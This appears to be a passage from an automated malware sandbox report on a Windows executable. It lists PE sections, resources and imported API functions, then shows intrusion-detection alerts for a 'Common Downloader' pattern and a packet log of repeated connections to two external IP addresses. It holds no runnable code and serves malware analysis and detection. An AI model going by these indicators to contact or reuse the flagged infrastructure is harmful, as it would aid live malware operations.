                                                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xab0000x3cd00x3e0063fdf0c2f2da9e0fa6109f93b05c5b9dFalse0.42729334677419356data5.0081807187997684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                      RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                      RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xab7c00xd7fPNG image data, 189 x 189, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9357452966714906
                                                                                      RT_MENU0xac5400x50dataEnglishGreat Britain0.9
                                                                                      RT_DIALOG0xac5900xfcdataEnglishGreat Britain0.6507936507936508
                                                                                      RT_STRING0xac6900x530dataEnglishGreat Britain0.33960843373493976
                                                                                      RT_STRING0xacbc00x690dataEnglishGreat Britain0.26964285714285713
                                                                                      RT_STRING0xad2500x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                      RT_STRING0xad7200x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xadd200x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xae3800x388dataEnglishGreat Britain0.377212389380531
                                                                                      RT_STRING0xae7080x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                      RT_GROUP_ICON0xae8600x14dataEnglishGreat Britain1.25
                                                                                      RT_GROUP_ICON0xae8780x14dataEnglishGreat Britain1.15
                                                                                      RT_GROUP_ICON0xae8900x14dataEnglishGreat Britain1.25
                                                                                      RT_GROUP_ICON0xae8a80x14dataEnglishGreat Britain1.25
                                                                                      RT_VERSION0xae8c00x19cdataEnglishGreat Britain0.5339805825242718
                                                                                      RT_MANIFEST0xaea600x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                      DLLImport
                                                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-10-09T12:13:22.695857+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707193.122.6.16880TCP
                                                                                      2024-10-09T12:13:24.055222+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707193.122.6.16880TCP
                                                                                      2024-10-09T12:13:24.632122+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849709188.114.97.3443TCP
                                                                                      2024-10-09T12:13:25.320876+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849710193.122.6.16880TCP
                                                                                      2024-10-09T12:13:26.570853+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849712193.122.6.16880TCP
                                                                                      2024-10-09T12:13:28.389130+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849715188.114.97.3443TCP
                                                                                      2024-10-09T12:13:29.697584+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849717188.114.97.3443TCP
                                                                                      2024-10-09T12:13:30.944903+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849719188.114.97.3443TCP
                                                                                      2024-10-09T12:13:33.512913+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849723188.114.97.3443TCP
                                                                                      2024-10-09T12:13:44.852153+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849726193.122.6.16880TCP
                                                                                      2024-10-09T12:13:46.117764+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849726193.122.6.16880TCP
                                                                                      2024-10-09T12:13:46.686856+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849728188.114.97.3443TCP
                                                                                      2024-10-09T12:13:47.508378+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849729193.122.6.16880TCP
                                                                                      2024-10-09T12:13:48.774029+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849731193.122.6.16880TCP
                                                                                      2024-10-09T12:13:50.227142+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849733193.122.6.16880TCP
                                                                                      2024-10-09T12:13:51.539676+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849735193.122.6.16880TCP
                                                                                      2024-10-09T12:13:55.013930+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849740188.114.97.3443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 9, 2024 12:13:21.812280893 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:21.819936991 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:21.820056915 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:21.820281029 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:21.828077078 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:22.455116034 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:22.460577965 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:22.465603113 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:22.647372007 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:22.695857048 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:23.147881031 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.147908926 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.147986889 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.175446987 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.175462961 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.647234917 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.647325039 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.652410984 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.652430058 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.652753115 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.695851088 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.704521894 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.747427940 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.812184095 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.812453032 CEST44349708188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:23.812618017 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.819051981 CEST49708443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:23.826191902 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:23.831049919 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.013350964 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.016805887 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.016849041 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.016928911 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.017545938 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.017559052 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.055222034 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.481694937 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.491529942 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.491553068 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.632142067 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.632339954 CEST44349709188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.632419109 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.632848024 CEST49709443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:24.643614054 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.644639015 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.648701906 CEST8049707193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.648801088 CEST4970780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.649457932 CEST8049710193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:24.649529934 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.649668932 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:24.654697895 CEST8049710193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.277949095 CEST8049710193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.279835939 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.279882908 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.279989958 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.280267954 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.280283928 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.320875883 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.740766048 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.742818117 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.742841005 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.865726948 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.865987062 CEST44349711188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.866055012 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.866502047 CEST49711443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:25.870276928 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.871795893 CEST4971280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.875397921 CEST8049710193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.875453949 CEST4971080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.876614094 CEST8049712193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:25.876691103 CEST4971280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.876764059 CEST4971280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:25.881480932 CEST8049712193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:26.521563053 CEST8049712193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:26.523142099 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:26.523180008 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:26.523258924 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:26.523581028 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:26.523592949 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:26.570852995 CEST4971280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:27.013115883 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.015294075 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.015326023 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.152435064 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.152667046 CEST44349713188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.152720928 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.153167963 CEST49713443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.158269882 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:27.163130999 CEST8049714193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.163218975 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:27.163322926 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:27.168107986 CEST8049714193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.792618990 CEST8049714193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.794040918 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.794080019 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.794154882 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.794477940 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:27.794497013 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:27.836478949 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.250508070 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.252365112 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:28.252403021 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.389086008 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.389178038 CEST44349715188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.389252901 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:28.389899969 CEST49715443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:28.403615952 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.404653072 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.409681082 CEST8049714193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.410142899 CEST8049716193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:28.410224915 CEST4971480192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.410254002 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.410387039 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:28.416002989 CEST8049716193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.064634085 CEST8049716193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.066337109 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.066387892 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.066457033 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.066896915 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.066910028 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.117754936 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.570430040 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.572757006 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.572781086 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.697581053 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.697664022 CEST44349717188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.697735071 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.698544979 CEST49717443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:29.705284119 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.706382036 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.710661888 CEST8049716193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.710809946 CEST4971680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.711298943 CEST8049718193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:29.711373091 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.711517096 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:29.716315031 CEST8049718193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.337675095 CEST8049718193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.346719027 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.346787930 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.346879959 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.350466967 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.350492954 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.384954929 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.815442085 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.817563057 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.817586899 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.944982052 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.945213079 CEST44349719188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.945285082 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.946079016 CEST49719443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:30.949599028 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.950876951 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.954902887 CEST8049718193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.954974890 CEST4971880192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.955717087 CEST8049720193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:30.955795050 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.955969095 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:30.960726976 CEST8049720193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:31.600641012 CEST8049720193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:31.602226019 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:31.602268934 CEST44349721188.114.97.3192.168.2.8
